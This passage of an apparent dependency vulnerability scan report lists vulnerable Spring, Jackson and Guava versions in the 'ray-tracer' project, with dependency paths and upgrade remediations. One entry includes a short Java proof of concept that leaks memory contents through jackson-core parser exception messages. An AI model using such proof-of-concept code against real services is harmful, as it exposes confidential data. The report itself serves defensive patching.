One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-beans to version 5.2.22.RELEASE, 5.3.20 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.23.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.20.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an OutOfMemoryError.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-expression to version 5.2.20.RELEASE, 5.3.17 or higher.
References
medium severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.10.5.1 and com.fasterxml.jackson.core:jackson-databind@2.10.5.1
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-core@2.10.5.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.13.0.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.fasterxml.jackson.core:jackson-databind@2.10.5.1 › com.fasterxml.jackson.core:jackson-core@2.10.5Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.13.0.
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Information Exposure due to the JsonLocation._appendSourceDesc method. An attacker can access up to 500 bytes of unintended memory content by exploiting exception messages that incorrectly read from the beginning of a byte array instead of the logical payload start.
Workaround
This vulnerability can be mitigated by disabling exception message exposure to clients to avoid returning parsing exception messages in HTTP responses and/or disabling source inclusion in exceptions to prevent Jackson from embedding any source content in exception messages, avoiding leakage.
PoC
byte[] buffer = new byte[1000];
System.arraycopy("SECRET".getBytes(), 0, buffer, 0, 6);
System.arraycopy("{ \"bad\": }".getBytes(), 0, buffer, 700, 10);
JsonFactory factory = new JsonFactory();
JsonParser parser = factory.createParser(buffer, 700, 20);
parser.nextToken(); // throws exception
// Exception message will include "SECRET"
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.13.0-rc1 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.19.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.19.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.19.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.19.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.19.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.
Remediation
Upgrade org.springframework:spring-core to version 5.2.19.RELEASE, 5.3.14 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.18.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.18.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.18.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.18.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.18.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.
Remediation
Upgrade org.springframework:spring-core to version 5.3.12, 5.2.18 or higher.
References
low severity
- Vulnerable module: org.springframework:spring-context
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@5.2.21.RELEASE.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE
Overview
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for disallowedFields on a DataBinder. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.
Remediation
Upgrade org.springframework:spring-context to version 5.2.21, 5.3.19 or higher.
References
low severity
- Vulnerable module: com.google.guava:guava
- Introduced through: com.google.guava:guava@30.0-android
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.google.guava:guava@30.0-androidRemediation: Upgrade to com.google.guava:guava@32.0.0-android.
Overview
com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.
Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.
NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.
Remediation
Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.
References
low severity
- Vulnerable module: org.springframework:spring-context
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE
Overview
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-context to version 6.1.14 or higher.
References
low severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-context@5.2.0.RELEASE and com.gluonhq:ignite-spring@1.0.2
Detailed paths
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASERemediation: Upgrade to org.springframework:spring-context@6.1.14.
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-expression@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
-
Introduced through: Stingray42/ray-tracer@Stingray42/ray-tracer#1ade81fb390da21af5fe441bb8d7c7ce53351633 › com.gluonhq:ignite-spring@1.0.2 › org.springframework:spring-context@5.2.0.RELEASE › org.springframework:spring-aop@5.2.0.RELEASE › org.springframework:spring-beans@5.2.0.RELEASE › org.springframework:spring-core@5.2.0.RELEASE
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-core to version 6.1.14 or higher.